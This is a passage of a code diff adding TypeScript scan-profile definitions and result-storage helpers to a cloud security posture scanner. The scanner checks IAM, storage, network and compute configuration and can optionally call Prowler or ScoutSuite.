+++ b/packages/opencode/src/pentest/cloudscan/profiles.ts
@@ -0,0 +1,723 @@
+/**
+ * @fileoverview Cloud Scan Profiles
+ *
+ * Pre-defined scan profiles for different cloud security testing scenarios.
+ *
+ * @module pentest/cloudscan/profiles
+ */
+
+import { CloudScanTypes } from "./types"
+
+/**
+ * Cloud scan profiles namespace.
+ */
+export namespace CloudScanProfiles {
+  /**
+   * Discovery profile - enumerate resources only.
+   */
+  export const Discovery: CloudScanTypes.ScanProfile = {
+    id: "discovery",
+    name: "Discovery",
+    description: "Enumerate cloud resources without security checks",
+    phases: ["discovery"],
+    externalTools: { prowler: false, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["iam", "storage", "network", "compute"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: false,
+        accessKeys: false,
+        mfaCheck: false,
+        permissionAnalysis: false,
+        unusedCredentials: false,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: false,
+        encryption: false,
+        logging: false,
+        versioning: false,
+        bucketPolicies: false,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: false,
+        vpcs: true,
+        flowLogs: false,
+        nacls: false,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: false,
+        imdsCheck: false,
+        functions: true,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 120000,
+    rateLimit: 50,
+    maxConcurrent: 10,
+  }
+
+  /**
+   * Quick profile - fast security assessment.
+   */
+  export const Quick: CloudScanTypes.ScanProfile = {
+    id: "quick",
+    name: "Quick",
+    description: "Fast security assessment with essential checks",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: false, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["iam", "storage", "network", "compute"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: false,
+        unusedCredentials: false,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: false,
+        versioning: false,
+        bucketPolicies: false,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: false,
+        nacls: false,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: true,
+        functions: true,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 180000,
+    rateLimit: 30,
+    maxConcurrent: 10,
+  }
+
+  /**
+   * Standard profile - balanced assessment.
+   */
+  export const Standard: CloudScanTypes.ScanProfile = {
+    id: "standard",
+    name: "Standard",
+    description: "Balanced cloud security assessment",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: true, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["iam", "storage", "network", "compute"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: true,
+        unusedCredentials: true,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: true,
+        versioning: true,
+        bucketPolicies: true,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: true,
+        nacls: false,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: true,
+        functions: true,
+        containers: true,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 300000,
+    rateLimit: 20,
+    maxConcurrent: 8,
+  }
+
+  /**
+   * Thorough profile - comprehensive assessment.
+   */
+  export const Thorough: CloudScanTypes.ScanProfile = {
+    id: "thorough",
+    name: "Thorough",
+    description: "Comprehensive cloud security assessment with all checks",
+    phases: ["discovery", "security", "compliance"],
+    externalTools: { prowler: true, scoutsuite: true },
+    complianceFrameworks: ["cis"],
+    resourceTypes: ["iam", "storage", "network", "compute", "database", "secrets", "logging"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: true,
+        unusedCredentials: true,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: true,
+        versioning: true,
+        bucketPolicies: true,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: true,
+        nacls: true,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: true,
+        functions: true,
+        containers: true,
+      },
+      compliance: {
+        enabled: true,
+        frameworks: ["cis"],
+        useProwler: true,
+        useScoutSuite: true,
+      },
+    },
+    timeout: 600000,
+    rateLimit: 10,
+    maxConcurrent: 5,
+  }
+
+  /**
+   * Compliance profile - compliance framework focused.
+   */
+  export const Compliance: CloudScanTypes.ScanProfile = {
+    id: "compliance",
+    name: "Compliance",
+    description: "Compliance framework assessment (CIS, NIST, PCI-DSS)",
+    phases: ["discovery", "security", "compliance"],
+    externalTools: { prowler: true, scoutsuite: true },
+    complianceFrameworks: ["cis", "nist", "pci-dss"],
+    resourceTypes: ["iam", "storage", "network", "compute", "database", "secrets", "logging"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: true,
+        unusedCredentials: true,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: true,
+        versioning: true,
+        bucketPolicies: true,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: true,
+        nacls: true,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: true,
+        functions: true,
+        containers: true,
+      },
+      compliance: {
+        enabled: true,
+        frameworks: ["cis", "nist", "pci-dss"],
+        useProwler: true,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 600000,
+    rateLimit: 10,
+    maxConcurrent: 5,
+  }
+
+  /**
+   * IAM Focused profile - IAM security only.
+   */
+  export const IAMFocused: CloudScanTypes.ScanProfile = {
+    id: "iam-focused",
+    name: "IAM Focused",
+    description: "Focus on IAM security assessment",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: true, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["iam"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: true,
+        unusedCredentials: true,
+      },
+      storage: {
+        enabled: false,
+        buckets: false,
+        publicAccess: false,
+        encryption: false,
+        logging: false,
+        versioning: false,
+        bucketPolicies: false,
+      },
+      network: {
+        enabled: false,
+        securityGroups: false,
+        publicIngress: false,
+        vpcs: false,
+        flowLogs: false,
+        nacls: false,
+      },
+      compute: {
+        enabled: false,
+        instances: false,
+        publicExposure: false,
+        imdsCheck: false,
+        functions: false,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 180000,
+    rateLimit: 30,
+    maxConcurrent: 10,
+  }
+
+  /**
+   * Storage Focused profile - storage security only.
+   */
+  export const StorageFocused: CloudScanTypes.ScanProfile = {
+    id: "storage-focused",
+    name: "Storage Focused",
+    description: "Focus on storage security assessment",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: true, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["storage"],
+    modules: {
+      iam: {
+        enabled: false,
+        users: false,
+        groups: false,
+        roles: false,
+        policies: false,
+        accessKeys: false,
+        mfaCheck: false,
+        permissionAnalysis: false,
+        unusedCredentials: false,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: true,
+        versioning: true,
+        bucketPolicies: true,
+      },
+      network: {
+        enabled: false,
+        securityGroups: false,
+        publicIngress: false,
+        vpcs: false,
+        flowLogs: false,
+        nacls: false,
+      },
+      compute: {
+        enabled: false,
+        instances: false,
+        publicExposure: false,
+        imdsCheck: false,
+        functions: false,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 180000,
+    rateLimit: 30,
+    maxConcurrent: 10,
+  }
+
+  /**
+   * Network Focused profile - network security only.
+   */
+  export const NetworkFocused: CloudScanTypes.ScanProfile = {
+    id: "network-focused",
+    name: "Network Focused",
+    description: "Focus on network security assessment",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: true, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["network", "compute"],
+    modules: {
+      iam: {
+        enabled: false,
+        users: false,
+        groups: false,
+        roles: false,
+        policies: false,
+        accessKeys: false,
+        mfaCheck: false,
+        permissionAnalysis: false,
+        unusedCredentials: false,
+      },
+      storage: {
+        enabled: false,
+        buckets: false,
+        publicAccess: false,
+        encryption: false,
+        logging: false,
+        versioning: false,
+        bucketPolicies: false,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: true,
+        nacls: true,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: false,
+        functions: false,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 180000,
+    rateLimit: 30,
+    maxConcurrent: 10,
+  }
+
+  /**
+   * Custom profile template - user configurable.
+   */
+  export const Custom: CloudScanTypes.ScanProfile = {
+    id: "custom",
+    name: "Custom",
+    description: "User-configurable scan profile",
+    phases: ["discovery", "security"],
+    externalTools: { prowler: false, scoutsuite: false },
+    complianceFrameworks: [],
+    resourceTypes: ["iam", "storage", "network", "compute"],
+    modules: {
+      iam: {
+        enabled: true,
+        users: true,
+        groups: true,
+        roles: true,
+        policies: true,
+        accessKeys: true,
+        mfaCheck: true,
+        permissionAnalysis: false,
+        unusedCredentials: false,
+      },
+      storage: {
+        enabled: true,
+        buckets: true,
+        publicAccess: true,
+        encryption: true,
+        logging: true,
+        versioning: true,
+        bucketPolicies: false,
+      },
+      network: {
+        enabled: true,
+        securityGroups: true,
+        publicIngress: true,
+        vpcs: true,
+        flowLogs: false,
+        nacls: false,
+      },
+      compute: {
+        enabled: true,
+        instances: true,
+        publicExposure: true,
+        imdsCheck: true,
+        functions: true,
+        containers: false,
+      },
+      compliance: {
+        enabled: false,
+        frameworks: [],
+        useProwler: false,
+        useScoutSuite: false,
+      },
+    },
+    timeout: 300000,
+    rateLimit: 20,
+    maxConcurrent: 8,
+  }
+
+  /**
+   * All available profiles.
+   */
+  export const All: Record<CloudScanTypes.ProfileId, CloudScanTypes.ScanProfile> = {
+    discovery: Discovery,
+    quick: Quick,
+    standard: Standard,
+    thorough: Thorough,
+    compliance: Compliance,
+    "iam-focused": IAMFocused,
+    "storage-focused": StorageFocused,
+    "network-focused": NetworkFocused,
+    custom: Custom,
+  }
+
+  /**
+   * Get a profile by ID.
+   */
+  export function get(id: CloudScanTypes.ProfileId): CloudScanTypes.ScanProfile | undefined {
+    return All[id]
+  }
+
+  /**
+   * List all profiles.
+   */
+  export function list(): CloudScanTypes.ScanProfile[] {
+    return Object.values(All)
+  }
+
+  /**
+   * Create a custom profile with overrides.
+   */
+  export function createCustom(
+    base: CloudScanTypes.ProfileId,
+    overrides: Partial<Omit<CloudScanTypes.ScanProfile, "id">>
+  ): CloudScanTypes.ScanProfile {
+    const baseProfile = get(base) || Custom
+    return {
+      ...baseProfile,
+      ...overrides,
+      id: "custom",
+      phases: overrides.phases ?? baseProfile.phases,
+      externalTools: { ...baseProfile.externalTools, ...overrides.externalTools },
+      complianceFrameworks: overrides.complianceFrameworks ?? baseProfile.complianceFrameworks,
+      resourceTypes: overrides.resourceTypes ?? baseProfile.resourceTypes,
+      modules: {
+        iam: { ...baseProfile.modules.iam, ...overrides.modules?.iam },
+        storage: { ...baseProfile.modules.storage, ...overrides.modules?.storage },
+        network: { ...baseProfile.modules.network, ...overrides.modules?.network },
+        compute: { ...baseProfile.modules.compute, ...overrides.modules?.compute },
+        compliance: { ...baseProfile.modules.compliance, ...overrides.modules?.compliance },
+      },
+    }
+  }
+
+  /**
+   * Format profile for display.
+   */
+  export function format(profile: CloudScanTypes.ScanProfile): string {
+    const lines: string[] = []
+    lines.push(`Profile: ${profile.name} (${profile.id})`)
+    lines.push(`Description: ${profile.description}`)
+    lines.push("")
+
+    lines.push(`Phases: ${profile.phases.join(", ")}`)
+    lines.push(`External Tools: Prowler=${profile.externalTools.prowler ? "Yes" : "No"}, ScoutSuite=${profile.externalTools.scoutsuite ? "Yes" : "No"}`)
+    lines.push(`Compliance Frameworks: ${profile.complianceFrameworks.length > 0 ? profile.complianceFrameworks.join(", ") : "None"}`)
+    lines.push(`Resource Types: ${profile.resourceTypes.join(", ")}`)
+    lines.push("")
+
+    lines.push("IAM:")
+    lines.push(`  Enabled: ${profile.modules.iam.enabled ? "Yes" : "No"}`)
+    if (profile.modules.iam.enabled) {
+      lines.push(`  Users: ${profile.modules.iam.users ? "Yes" : "No"}`)
+      lines.push(`  Groups: ${profile.modules.iam.groups ? "Yes" : "No"}`)
+      lines.push(`  Roles: ${profile.modules.iam.roles ? "Yes" : "No"}`)
+      lines.push(`  Policies: ${profile.modules.iam.policies ? "Yes" : "No"}`)
+      lines.push(`  MFA Check: ${profile.modules.iam.mfaCheck ? "Yes" : "No"}`)
+      lines.push(`  Permission Analysis: ${profile.modules.iam.permissionAnalysis ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("Storage:")
+    lines.push(`  Enabled: ${profile.modules.storage.enabled ? "Yes" : "No"}`)
+    if (profile.modules.storage.enabled) {
+      lines.push(`  Public Access Check: ${profile.modules.storage.publicAccess ? "Yes" : "No"}`)
+      lines.push(`  Encryption Check: ${profile.modules.storage.encryption ? "Yes" : "No"}`)
+      lines.push(`  Logging Check: ${profile.modules.storage.logging ? "Yes" : "No"}`)
+      lines.push(`  Bucket Policies: ${profile.modules.storage.bucketPolicies ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("Network:")
+    lines.push(`  Enabled: ${profile.modules.network.enabled ? "Yes" : "No"}`)
+    if (profile.modules.network.enabled) {
+      lines.push(`  Security Groups: ${profile.modules.network.securityGroups ? "Yes" : "No"}`)
+      lines.push(`  Public Ingress: ${profile.modules.network.publicIngress ? "Yes" : "No"}`)
+      lines.push(`  VPCs: ${profile.modules.network.vpcs ? "Yes" : "No"}`)
+      lines.push(`  Flow Logs: ${profile.modules.network.flowLogs ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("Compute:")
+    lines.push(`  Enabled: ${profile.modules.compute.enabled ? "Yes" : "No"}`)
+    if (profile.modules.compute.enabled) {
+      lines.push(`  Instances: ${profile.modules.compute.instances ? "Yes" : "No"}`)
+      lines.push(`  Public Exposure: ${profile.modules.compute.publicExposure ? "Yes" : "No"}`)
+      lines.push(`  IMDS Check: ${profile.modules.compute.imdsCheck ? "Yes" : "No"}`)
+      lines.push(`  Functions: ${profile.modules.compute.functions ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push("Compliance:")
+    lines.push(`  Enabled: ${profile.modules.compliance.enabled ? "Yes" : "No"}`)
+    if (profile.modules.compliance.enabled) {
+      lines.push(`  Frameworks: ${profile.modules.compliance.frameworks.join(", ") || "None"}`)
+      lines.push(`  Prowler: ${profile.modules.compliance.useProwler ? "Yes" : "No"}`)
+      lines.push(`  ScoutSuite: ${profile.modules.compliance.useScoutSuite ? "Yes" : "No"}`)
+    }
+
+    lines.push("")
+    lines.push(`Timeout: ${profile.timeout}ms`)
+    if (profile.rateLimit) lines.push(`Rate Limit: ${profile.rateLimit} req/s`)
+    if (profile.maxConcurrent) lines.push(`Max Concurrent: ${profile.maxConcurrent}`)
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format all profiles as a summary table.
+   */
+  export function formatTable(): string {
+    const lines: string[] = []
+    lines.push("| Profile | IAM | Storage | Network | Compute | Compliance | Use Case |")
+    lines.push("|---------|-----|---------|---------|---------|------------|----------|")
+
+    for (const profile of list()) {
+      const iam = profile.modules.iam.enabled
+        ? profile.modules.iam.permissionAnalysis
+          ? "full"
+          : "basic"
+        : "-"
+      const storage = profile.modules.storage.enabled
+        ? profile.modules.storage.bucketPolicies
+          ? "full"
+          : "basic"
+        : "-"
+      const network = profile.modules.network.enabled
+        ? profile.modules.network.flowLogs
+          ? "full"
+          : "basic"
+        : "-"
+      const compute = profile.modules.compute.enabled
+        ? profile.modules.compute.containers
+          ? "full"
+          : "basic"
+        : "-"
+      const compliance = profile.modules.compliance.enabled
+        ? profile.modules.compliance.frameworks.join(",") || "basic"
+        : "-"
+
+      lines.push(
+        `| ${profile.id} | ${iam} | ${storage} | ${network} | ${compute} | ${compliance} | ${profile.description} |`
+      )
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/cloudscan/storage.ts b/packages/opencode/src/pentest/cloudscan/storage.ts
new file mode 100644
index 00000000000..81798866e77
--- /dev/null
+++ b/packages/opencode/src/pentest/cloudscan/storage.ts
@@ -0,0 +1,676 @@
+/**
+ * @fileoverview Cloud Scan Storage
+ *
+ * Storage helpers for cloud scan results, resources, and findings.
+ *
+ * @module pentest/cloudscan/storage
+ */
+
+import { randomBytes } from "crypto"
+import { Storage } from "../../storage/storage"
+import { CloudScanTypes } from "./types"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "cloudscan.storage" })
+
+/**
+ * Generate a unique scan ID.
+ */
+function generateScanId(): string {
+  const timestamp = Date.now().toString(36)
+  const random = randomBytes(6).toString("hex")
+  return `cloudscan_${timestamp}_${random}`
+}
+
+/**
+ * Generate a unique resource ID.
+ */
+function generateResourceId(provider: string, type: string, name: string): string {
+  const sanitized = name.replace(/[^a-zA-Z0-9-_]/g, "_").slice(0, 32)
+  return `${provider}_${type}_${sanitized}`
+}
+
+/**
+ * Storage configuration.
+ */
+export interface StorageConfig {
+  storage?: "file" | "memory"
+}
+
+/**
+ * Cloud scan storage namespace.
+ */
+export namespace CloudScanStorage {
+  /** In-memory buffers for testing */
+  const scanBuffer: CloudScanTypes.CloudScanResult[] = []
+  const findingBuffer: CloudScanTypes.CloudFinding[] = []
+  const resourceBuffer: CloudScanTypes.CloudResource[] = []
+  const bucketBuffer: CloudScanTypes.StorageBucket[] = []
+  const securityGroupBuffer: CloudScanTypes.SecurityGroup[] = []
+  const principalBuffer: CloudScanTypes.IAMPrincipal[] = []
+
+  // ========== Scan Results ==========
+
+  /**
+   * Save a scan result.
+   */
+  export async function saveScan(
+    result: Omit<CloudScanTypes.CloudScanResult, "id"> | CloudScanTypes.CloudScanResult,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.CloudScanResult> {
+    const full: CloudScanTypes.CloudScanResult = {
+      ...result,
+      id: "id" in result && result.id ? result.id : generateScanId(),
+    }
+    const validated = CloudScanTypes.CloudScanResult.parse(full)
+
+    if (config.storage === "memory") {
+      const existingIdx = scanBuffer.findIndex((s) => s.id === validated.id)
+      if (existingIdx >= 0) {
+        scanBuffer[existingIdx] = validated
+      } else {
+        scanBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "scans", validated.id], validated)
+    }
+
+    log.info("Cloud scan saved", {
+      id: validated.id,
+      provider: validated.provider,
+      profile: validated.profile,
+      resourceCount: validated.resources.length,
+      findingsCount: validated.findings.length,
+    })
+    return validated
+  }
+
+  /**
+   * Get a scan result by ID.
+   */
+  export async function getScan(id: string, config: StorageConfig = {}): Promise<CloudScanTypes.CloudScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<CloudScanTypes.CloudScanResult>(["pentest", "cloudscan", "scans", id])
+      return CloudScanTypes.CloudScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List scan results with filters.
+   * @overload Simple call with optional provider filter, returns simplified scan info.
+   * @overload Full call with config and filters, returns full scan results.
+   */
+  export async function listScans(
+    providerOrConfig?: CloudScanTypes.CloudProvider | StorageConfig,
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      profile?: CloudScanTypes.ProfileId
+      status?: CloudScanTypes.Status
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.CloudScanResult[] | Array<{ id: string; provider: string; timestamp: number }>> {
+    // Handle simplified call pattern: listScans(provider?)
+    if (providerOrConfig === undefined || typeof providerOrConfig === "string") {
+      const provider = providerOrConfig as CloudScanTypes.CloudProvider | undefined
+      let scans: CloudScanTypes.CloudScanResult[]
+
+      const keys = await Storage.list(["pentest", "cloudscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.CloudScanResult>(key)
+          scans.push(CloudScanTypes.CloudScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+
+      // Apply provider filter
+      if (provider) {
+        scans = scans.filter((s) => s.provider === provider)
+      }
+
+      // Sort by start time (newest first)
+      scans.sort((a, b) => b.startedAt - a.startedAt)
+
+      // Return simplified format
+      return scans.map((s) => ({
+        id: s.id,
+        provider: s.provider,
+        timestamp: s.startedAt,
+      }))
+    }
+
+    // Handle full call pattern: listScans(config, filters?)
+    const config = providerOrConfig as StorageConfig
+    let scans: CloudScanTypes.CloudScanResult[]
+
+    if (config.storage === "memory") {
+      scans = [...scanBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "scans"])
+      scans = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.CloudScanResult>(key)
+          scans.push(CloudScanTypes.CloudScanResult.parse(data))
+        } catch {
+          log.warn("Failed to parse scan file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      scans = scans.filter((s) => s.provider === filters.provider)
+    }
+    if (filters?.profile) {
+      scans = scans.filter((s) => s.profile === filters.profile)
+    }
+    if (filters?.status) {
+      scans = scans.filter((s) => s.status === filters.status)
+    }
+
+    // Sort by start time (newest first)
+    scans.sort((a, b) => b.startedAt - a.startedAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      scans = scans.slice(0, filters.limit)
+    }
+
+    return scans
+  }
+
+  /**
+   * Load a scan result by ID.
+   */
+  export async function loadScan(scanID: string, config: StorageConfig = {}): Promise<CloudScanTypes.CloudScanResult | null> {
+    if (config.storage === "memory") {
+      return scanBuffer.find((s) => s.id === scanID) || null
+    }
+
+    try {
+      const data = await Storage.read<CloudScanTypes.CloudScanResult>(["pentest", "cloudscan", "scans", scanID])
+      return CloudScanTypes.CloudScanResult.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * Delete a scan result.
+   */
+  export async function deleteScan(id: string, config: StorageConfig = {}): Promise<boolean> {
+    if (config.storage === "memory") {
+      const idx = scanBuffer.findIndex((s) => s.id === id)
+      if (idx >= 0) {
+        scanBuffer.splice(idx, 1)
+        return true
+      }
+      return false
+    }
+
+    try {
+      await Storage.remove(["pentest", "cloudscan", "scans", id])
+      return true
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return false
+      }
+      throw err
+    }
+  }
+
+  // ========== Findings ==========
+
+  /**
+   * Save a finding.
+   */
+  export async function saveFinding(
+    finding: CloudScanTypes.CloudFinding,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.CloudFinding> {
+    const validated = CloudScanTypes.CloudFinding.parse(finding)
+
+    if (config.storage === "memory") {
+      const existingIdx = findingBuffer.findIndex((f) => f.id === validated.id)
+      if (existingIdx >= 0) {
+        findingBuffer[existingIdx] = validated
+      } else {
+        findingBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "findings", validated.id], validated)
+    }
+
+    log.info("Finding saved", {
+      id: validated.id,
+      severity: validated.severity,
+      category: validated.category,
+    })
+    return validated
+  }
+
+  /**
+   * Get a finding by ID.
+   */
+  export async function getFinding(id: string, config: StorageConfig = {}): Promise<CloudScanTypes.CloudFinding | null> {
+    if (config.storage === "memory") {
+      return findingBuffer.find((f) => f.id === id) || null
+    }
+
+    try {
+      const data = await Storage.read<CloudScanTypes.CloudFinding>(["pentest", "cloudscan", "findings", id])
+      return CloudScanTypes.CloudFinding.parse(data)
+    } catch (err) {
+      if (err instanceof Storage.NotFoundError) {
+        return null
+      }
+      throw err
+    }
+  }
+
+  /**
+   * List findings with filters.
+   */
+  export async function listFindings(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      severity?: CloudScanTypes.Severity
+      category?: string
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.CloudFinding[]> {
+    let findings: CloudScanTypes.CloudFinding[]
+
+    if (config.storage === "memory") {
+      findings = [...findingBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "findings"])
+      findings = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.CloudFinding>(key)
+          findings.push(CloudScanTypes.CloudFinding.parse(data))
+        } catch {
+          log.warn("Failed to parse finding file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      findings = findings.filter((f) => f.provider === filters.provider)
+    }
+    if (filters?.severity) {
+      findings = findings.filter((f) => f.severity === filters.severity)
+    }
+    if (filters?.category) {
+      findings = findings.filter((f) => f.category === filters.category)
+    }
+
+    // Sort by found time (newest first)
+    findings.sort((a, b) => b.foundAt - a.foundAt)
+
+    // Apply limit
+    if (filters?.limit) {
+      findings = findings.slice(0, filters.limit)
+    }
+
+    return findings
+  }
+
+  // ========== Resources ==========
+
+  /**
+   * Save a cloud resource.
+   */
+  export async function saveResource(
+    resource: CloudScanTypes.CloudResource,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.CloudResource> {
+    const validated = CloudScanTypes.CloudResource.parse(resource)
+    const storageId = generateResourceId(validated.provider, validated.type, validated.id)
+
+    if (config.storage === "memory") {
+      const existingIdx = resourceBuffer.findIndex((r) => r.id === validated.id)
+      if (existingIdx >= 0) {
+        resourceBuffer[existingIdx] = validated
+      } else {
+        resourceBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "resources", storageId], validated)
+    }
+
+    log.debug("Resource saved", {
+      id: validated.id,
+      type: validated.type,
+      provider: validated.provider,
+    })
+    return validated
+  }
+
+  /**
+   * List resources with filters.
+   */
+  export async function listResources(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      type?: CloudScanTypes.ResourceType
+      region?: string
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.CloudResource[]> {
+    let resources: CloudScanTypes.CloudResource[]
+
+    if (config.storage === "memory") {
+      resources = [...resourceBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "resources"])
+      resources = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.CloudResource>(key)
+          resources.push(CloudScanTypes.CloudResource.parse(data))
+        } catch {
+          log.warn("Failed to parse resource file", { key })
+        }
+      }
+    }
+
+    // Apply filters
+    if (filters?.provider) {
+      resources = resources.filter((r) => r.provider === filters.provider)
+    }
+    if (filters?.type) {
+      resources = resources.filter((r) => r.type === filters.type)
+    }
+    if (filters?.region) {
+      resources = resources.filter((r) => r.region === filters.region)
+    }
+
+    // Apply limit
+    if (filters?.limit) {
+      resources = resources.slice(0, filters.limit)
+    }
+
+    return resources
+  }
+
+  // ========== Storage Buckets ==========
+
+  /**
+   * Save a storage bucket.
+   */
+  export async function saveBucket(
+    bucket: CloudScanTypes.StorageBucket,
+    config: StorageConfig = {}
+  ): Promise<CloudScanTypes.StorageBucket> {
+    const validated = CloudScanTypes.StorageBucket.parse(bucket)
+
+    if (config.storage === "memory") {
+      const existingIdx = bucketBuffer.findIndex((b) => b.id === validated.id)
+      if (existingIdx >= 0) {
+        bucketBuffer[existingIdx] = validated
+      } else {
+        bucketBuffer.push(validated)
+      }
+    } else {
+      await Storage.write(["pentest", "cloudscan", "buckets", validated.id], validated)
+    }
+
+    log.debug("Bucket saved", {
+      id: validated.id,
+      name: validated.name,
+      accessLevel: validated.accessLevel,
+    })
+    return validated
+  }
+
+  /**
+   * List storage buckets with filters.
+   */
+  export async function listBuckets(
+    config: StorageConfig = {},
+    filters?: {
+      provider?: CloudScanTypes.CloudProvider
+      isPublic?: boolean
+      limit?: number
+    }
+  ): Promise<CloudScanTypes.StorageBucket[]> {
+    let buckets: CloudScanTypes.StorageBucket[]
+
+    if (config.storage === "memory") {
+      buckets = [...bucketBuffer]
+    } else {
+      const keys = await Storage.list(["pentest", "cloudscan", "buckets"])
+      buckets = []
+      for (const key of keys) {
+        try {
+          const data = await Storage.read<CloudScanTypes.StorageBucket>(key)
+          buckets.push(CloudScanTypes.StorageBucket.parse(data))
+        } catch {
